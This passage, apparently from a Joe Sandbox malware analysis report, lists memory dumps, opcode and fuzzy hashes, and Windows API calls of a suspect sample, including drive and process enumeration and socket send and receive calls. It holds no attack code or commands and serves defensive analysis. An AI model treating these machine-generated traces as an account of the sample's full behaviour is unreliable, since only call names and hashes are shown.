                                                       • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: gethostname
                                                      • String ID:
                                                      • API String ID: 144339138-0
                                                      • Opcode ID: 187d078580df4786b1721f77a3289271c1be4f254aed9083c0dd4c4ce913b29a
                                                      • Instruction ID: cbb8a301dfd92e8952501e0fbfab1372d0487c16ba79a5477c7f4fdef9f86650
                                                      • Opcode Fuzzy Hash: 187d078580df4786b1721f77a3289271c1be4f254aed9083c0dd4c4ce913b29a
                                                      • Instruction Fuzzy Hash: 1551CFB06047028BEB30AB65D9497237EE4BF4131AF04093DED8AAB6D1E775E844CF12
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 072103F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID:
                                                      • API String ID: 999431828-0
                                                      • Opcode ID: b271c0dc525300dbe016407898d893b94c251ce18a6af4b80f2fd055f038fe13
                                                      • Instruction ID: 074c31289f812f2c0159f65fa5f328f06d0df120206a26d0c00cd5356cb8b6ac
                                                      • Opcode Fuzzy Hash: b271c0dc525300dbe016407898d893b94c251ce18a6af4b80f2fd055f038fe13
                                                      • Instruction Fuzzy Hash: FA314BEB238111BDB16291862B54AFBA7ADF5E7730B30C43BF807D5506E2D80B8D1532
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 072103F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID:
                                                      • API String ID: 999431828-0
                                                      • Opcode ID: 8ae97e6426428f72857ec295841c91089dd20e99995150429e942d4b7110ea93
                                                      • Instruction ID: 6ac944cb9b720537d4f292c2308f0810d07ea587e9a7364dbfa57072390ba015
                                                      • Opcode Fuzzy Hash: 8ae97e6426428f72857ec295841c91089dd20e99995150429e942d4b7110ea93
                                                      • Instruction Fuzzy Hash: 41314BEB23C111BDB16291962B95BFA67ADF5E7730B30C437F807D5506E2D80A8D1132
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: ab1cb28c31160768b5d2c90f91a2bf2942d9d82d7be5fd8f77ed9628ade5da5e
                                                      • Instruction ID: fb098132a34ac7286ebf110fa0c50a613cbfa77a9ff15793eb39259d0935481d
                                                      • Opcode Fuzzy Hash: ab1cb28c31160768b5d2c90f91a2bf2942d9d82d7be5fd8f77ed9628ade5da5e
                                                      • Instruction Fuzzy Hash: 5831A2E757C221AEB23181422B5CEFB566EE6C3730B308427B807D6641E3E90E997071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d219db7c3a88137bb43b32d82c8faf0b18f361e5e70dc233ab31deee93f55369
                                                      • Instruction ID: ccbd31cbba4487a423b7565a1d7079f6cc41c8ef6953aae3eaf80661c32b9f0c
                                                      • Opcode Fuzzy Hash: d219db7c3a88137bb43b32d82c8faf0b18f361e5e70dc233ab31deee93f55369
                                                      • Instruction Fuzzy Hash: EF316FE757C221AEB27181522B5CEFA676EE6C3730B30842BF806D6541E3D44ADA7071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2cf8fd50451319d560186d5b6bceac899edb1dce3c72994a8058ebdf77de2db7
                                                      • Instruction ID: a63d90a00721af29429d3d63d940792acb3c0b6b326be497854860e78b778e2d
                                                      • Opcode Fuzzy Hash: 2cf8fd50451319d560186d5b6bceac899edb1dce3c72994a8058ebdf77de2db7
                                                      • Instruction Fuzzy Hash: 5E3138E257C221AFB63285515B9CDF7675EEA83730B30842BF802D7541E3D40ECA60B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 11e4844ccd64e19566b9c2c7e910aba43f19349a677e989b77da4a1ac453015f
                                                      • Instruction ID: b293ce77fcd07f9b246c0042ef61c14ba0c04afb891ac1921de490abbdaf3546
                                                      • Opcode Fuzzy Hash: 11e4844ccd64e19566b9c2c7e910aba43f19349a677e989b77da4a1ac453015f
                                                      • Instruction Fuzzy Hash: 86315EF757C221AEB27181522B5CEFB665EE6C3730B308427F806D6541D3D40A9A6071
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE ref: 072103F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016697918.0000000007210000.00000040.00001000.00020000.00000000.sdmp, Offset: 07210000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7210000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID:
                                                      • API String ID: 999431828-0
                                                      • Opcode ID: 42fc57b09d55dec5bf6bf8b31d4f2d86f833ff5a90c2578b44a8e7bb198f47b0
                                                      • Instruction ID: 3648aa1eed21a7754da3d4c2bff9c815b4e8a30fc0577110aae470989d1dcbff
                                                      • Opcode Fuzzy Hash: 42fc57b09d55dec5bf6bf8b31d4f2d86f833ff5a90c2578b44a8e7bb198f47b0
                                                      • Instruction Fuzzy Hash: 81216DEB638114BDB16291962B94AFA67ADF6E7730B30C436F407D5506E2D80F8D1131
                                                      APIs
                                                      • Process32FirstW.KERNEL32(30F902FF,30F902FF,30F902FF,000035A0), ref: 0725038A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016783354.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7250000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: 0794ca44ed5f5bbe417f8f469a78672e4917b4f03d67d1cd40437818bace4858
                                                      • Instruction ID: 5da5ccad622c75091120f17a4f1d011ea8aab177de92e6ddb58586ba4da9c480
                                                      • Opcode Fuzzy Hash: 0794ca44ed5f5bbe417f8f469a78672e4917b4f03d67d1cd40437818bace4858
                                                      • Instruction Fuzzy Hash: 4C21D7EB1781117D712290A56F10AFBA67EE5D7770B308436FC07D3642E2F44E4A1031
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 3132a8dbdc3de21c653762f42d08398e56cd22dddddb050275bbf964e6736ee2
                                                      • Instruction ID: 9afb4d837a0f9b61f6320cdb9b847d719aafb94dff2f2900b6a1abf0552b1862
                                                      • Opcode Fuzzy Hash: 3132a8dbdc3de21c653762f42d08398e56cd22dddddb050275bbf964e6736ee2
                                                      • Instruction Fuzzy Hash: 5E21B1E757C121AFB23281526B9CEFB661EEAC3630F30842BF806D6541E2D44EDA6071
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 6841eb5dc0bd2f5c0eadb514c8a93d1b93958e453bd7ee2126228bf837db5ef9
                                                      • Instruction ID: 2a8fdfd0f0ed2a9cce28b425260cb42dfaa18027b048d0ea76d8786365fabed2
                                                      • Opcode Fuzzy Hash: 6841eb5dc0bd2f5c0eadb514c8a93d1b93958e453bd7ee2126228bf837db5ef9
                                                      • Instruction Fuzzy Hash: 852191E657C221AFA23195522B9CDFA665EEA83730F308427F806D6641E3D40E997071
                                                      APIs
                                                      • Process32NextW.KERNEL32(?,?), ref: 072603E0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: f38952252914556daed3bdef24dd0c9045fd2bb970bde1c7845dec0e98a9c03b
                                                      • Instruction ID: 213806befb893fb278ff2e4ae3760005f1ed0ff26b844051e78f6e0e5cacfc1c
                                                      • Opcode Fuzzy Hash: f38952252914556daed3bdef24dd0c9045fd2bb970bde1c7845dec0e98a9c03b
                                                      • Instruction Fuzzy Hash: 161127F6978222EFA3319521179C9BA6256BB93231F304427A802D7941E3E44AD53022
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: ecde24d808acc129035598b6895abf4e336ac0888fe2f000a78af11464bf999d
                                                      • Instruction ID: ae15dc1e113ce02e43591dabb55a5dbc2f502a8307e93a4f54fef3960891d9b9
                                                      • Opcode Fuzzy Hash: ecde24d808acc129035598b6895abf4e336ac0888fe2f000a78af11464bf999d
                                                      • Instruction Fuzzy Hash: 88112CF697C226EFA3319511179C9BAB256BB93331F304437A802D7941E3E44ED57071
                                                      APIs
                                                      • Process32FirstW.KERNEL32(30F902FF,30F902FF,30F902FF,000035A0), ref: 0725038A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016783354.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7250000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: 94e8d019f8288b88c2af4026b51f4a5b1b2a90634b56d23ab0faf8cc08ca8843
                                                      • Instruction ID: 0d116110e09e65a26c6fe9523d567a4fd0e3985c23e51991d73af51e31ad0170
                                                      • Opcode Fuzzy Hash: 94e8d019f8288b88c2af4026b51f4a5b1b2a90634b56d23ab0faf8cc08ca8843
                                                      • Instruction Fuzzy Hash: 2B117DE70682437F97234AB04F405F57B6AEBDB3707311869E89386602E2B59A0B4531
                                                      APIs
                                                      • Process32NextW.KERNEL32(?,?), ref: 072603E0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 142ca89b00827a930ee95d68f6bfb57c6ab165aead72bf1db45a5980aa5d2b39
                                                      • Instruction ID: 2e41e1ee52f66e0698b98fd51c9696e5d8e7eb99c41b69a04462dfa68ce445fe
                                                      • Opcode Fuzzy Hash: 142ca89b00827a930ee95d68f6bfb57c6ab165aead72bf1db45a5980aa5d2b39
                                                      • Instruction Fuzzy Hash: 6111CCE387C651AFE732922057CCDF67725FA9B236730406BE801DB142E1A51EE67022
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: ee85b533d3a740be7ff35c6b6b820b428b21e4d6c6dde60c128265f26317db0f
                                                      • Instruction ID: c63f1df0b52428703afaeaa134ed3657443ea09f4d6f553ead066b672df1c48d
                                                      • Opcode Fuzzy Hash: ee85b533d3a740be7ff35c6b6b820b428b21e4d6c6dde60c128265f26317db0f
                                                      • Instruction Fuzzy Hash: 9D114CE757C221AFE23256511798DB7A61AF693231B308437F842E7A42E1D41EE93072
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 9e9c9fe3dfdfee2b595ca76540c35577e21139fe91cda8d8748fbf8e800e1c36
                                                      • Instruction ID: 8e5e24a79d2f15499114755a19de5289b4ca678a9ec138a1b1a0a67a5fbf5f86
                                                      • Opcode Fuzzy Hash: 9e9c9fe3dfdfee2b595ca76540c35577e21139fe91cda8d8748fbf8e800e1c36
                                                      • Instruction Fuzzy Hash: DC014EE757C212EF62725151178CDB6651AF693231B308437F802E7A41E2E41DD53072
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016783354.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7250000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: 976be4cfb5d3a15022f4cc89910ede1b8dc0653afa1ea6e80afc3bf819cfffde
                                                      • Instruction ID: f1a1f325ad51e77c43ae54b399f15889161adb2fcb61740970c99c4dfd4af3ca
                                                      • Opcode Fuzzy Hash: 976be4cfb5d3a15022f4cc89910ede1b8dc0653afa1ea6e80afc3bf819cfffde
                                                      • Instruction Fuzzy Hash: 2101FEFB1B9202BFA12395A49F449FAB729FADB770B300879F80397501F2F4591A5531
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: ed10d65adf4fb270a7b97580cae8165c3e5fdde0626a3cc610a7be957cc76956
                                                      • Instruction ID: 43da63b0697d859a375b5b97ed31db31106bf0f6c4c7606e7a9063b3bcfaee22
                                                      • Opcode Fuzzy Hash: ed10d65adf4fb270a7b97580cae8165c3e5fdde0626a3cc610a7be957cc76956
                                                      • Instruction Fuzzy Hash: 2D01BDE7478211EFA23152612B99AF6B719F793331F304427E846E7A82D1E419E63033
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016783354.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7250000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: 30ec1e1668b75ec18542987c2b10156851567b7403387827f2f6c5f93e644579
                                                      • Instruction ID: 90fb63c725e276f354eeab53069859cc96858fe6352ea14802ff9b2146fa4591
                                                      • Opcode Fuzzy Hash: 30ec1e1668b75ec18542987c2b10156851567b7403387827f2f6c5f93e644579
                                                      • Instruction Fuzzy Hash: 9001A7EB1B9102BEA12395A05F509FAA62EE6DB771B304835F903D3602F2F48A0A1531
                                                      APIs
                                                      • Process32NextW.KERNEL32(?,?), ref: 072603E0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 4af3a1e66b7e3caa08fdc1feccd90cd6cd2825731fae74e3571149eec169cc64
                                                      • Instruction ID: 2b9bd732ebc7f36c183606375fa71c0eaf350cba969f7e9258ad31871426d92b
                                                      • Opcode Fuzzy Hash: 4af3a1e66b7e3caa08fdc1feccd90cd6cd2825731fae74e3571149eec169cc64
                                                      • Instruction Fuzzy Hash: F10170E78B8216AFA2325251178CEF6B616F683331B304437EC42D7A41E1E51EEA3072
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016783354.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7250000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: e5ce19e82da2f5070a80157d9b61b740c2b6009b1d6c9c8d365bb7c83ef0aef1
                                                      • Instruction ID: 4f2e03c8a33b6a54211197b51c00fb4a188fd42e8a055696111423681f5ede63
                                                      • Opcode Fuzzy Hash: e5ce19e82da2f5070a80157d9b61b740c2b6009b1d6c9c8d365bb7c83ef0aef1
                                                      • Instruction Fuzzy Hash: E40120EB1682027DE22395E04F405F9BB2EFAD73707310475F45397602F2F48A0A1132
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: f2a7ac49e8569c8b29f7c963e7935738cacd528e8e709890519d7fc01bfbdb89
                                                      • Instruction ID: 3f5f4bb785ac36bcc955b088b8fb5f89add59e35155b9f7bc0009be580fa22c3
                                                      • Opcode Fuzzy Hash: f2a7ac49e8569c8b29f7c963e7935738cacd528e8e709890519d7fc01bfbdb89
                                                      • Instruction Fuzzy Hash: CCF0A2E39742129F9230A571178CAF67209F683671B308827E842D7540F1D55DE73072
                                                      APIs
                                                      • Process32FirstW.KERNEL32(30F902FF,30F902FF,30F902FF,000035A0), ref: 0725038A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016783354.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7250000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: 0a23a6ab55d23b810f9c969b3141588d0efd4fbb80716d9ef41b774169a448f4
                                                      • Instruction ID: 9ddb99c1f5543d6e0c3d4cce3050827b1bdba33b0336d53bc0d7a7bfb4e57e60
                                                      • Opcode Fuzzy Hash: 0a23a6ab55d23b810f9c969b3141588d0efd4fbb80716d9ef41b774169a448f4
                                                      • Instruction Fuzzy Hash: 2BF0E9EB1A51027DA11391D01B146F6EB7DFAD7371B304035F803A3A02B2F44B0A2431
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 0954eb6c1d49400217f1b6c09f32207fed97dd4d9f35ddd5425751e37e18ba5e
                                                      • Instruction ID: ae02ac859cd43778880b5b43014960ce98b7c99738fee2c3696b48cbadcaf491
                                                      • Opcode Fuzzy Hash: 0954eb6c1d49400217f1b6c09f32207fed97dd4d9f35ddd5425751e37e18ba5e
                                                      • Instruction Fuzzy Hash: F0F0ACF2974301AFD63129611B986F7B369F713631F304826F880E7881E2E519D72061
                                                      APIs
                                                      • getsockname.WS2_32(?,?,00000080), ref: 0059AFD1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: getsockname
                                                      • String ID:
                                                      • API String ID: 3358416759-0
                                                      • Opcode ID: 7439bf74513d1b9be844e9ea9f322c12232353c4a00db2942516b94cca79a322
                                                      • Instruction ID: 44c9e503fa17a1dad689c3aa56db87cf5a935192ee32e091cb4c9e7a0c920295
                                                      • Opcode Fuzzy Hash: 7439bf74513d1b9be844e9ea9f322c12232353c4a00db2942516b94cca79a322
                                                      • Instruction Fuzzy Hash: 5E11847080878596FB268F1CD4027E6B7F4FFD0329F109A18E59942550F7369AC58BD2
                                                      APIs
                                                      • Process32NextW.KERNEL32(?,?), ref: 072603E0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2016803091.0000000007260000.00000040.00001000.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7260000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 840711077497e1f58e5a528e4718be4c94897406b55057ad3a74283b7892af02
                                                      • Instruction ID: 893291b13a45cb4c0d94690c874d1c9668c9239c1a7751aefa7f670401cebf0f
                                                      • Opcode Fuzzy Hash: 840711077497e1f58e5a528e4718be4c94897406b55057ad3a74283b7892af02
                                                      • Instruction Fuzzy Hash: 320199F29293119FCB336B7122C95F9BB60FE43132B6484BAD8809F846D26905576262
                                                      APIs
                                                      • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0059A97F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                       • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: send
                                                      • String ID:
                                                      • API String ID: 2809346765-0
                                                      • Opcode ID: b79c329d4546e731780b37e677c2da6458da7dead77c242f6bb8fd3374bf3992
                                                      • Instruction ID: 10888b264d76c55d978d2fbd8732d1e96554be7615e9e45452149cdd31ec9afe
                                                      • Opcode Fuzzy Hash: b79c329d4546e731780b37e677c2da6458da7dead77c242f6bb8fd3374bf3992
                                                      • Instruction Fuzzy Hash: 4601A771B007109FD7148F14D845B56BBA5FFC4720F068559E9982B361C331AC108BE1
                                                      APIs
                                                      • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0058712E,?,?,?,00001001,00000000), ref: 0059A90C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
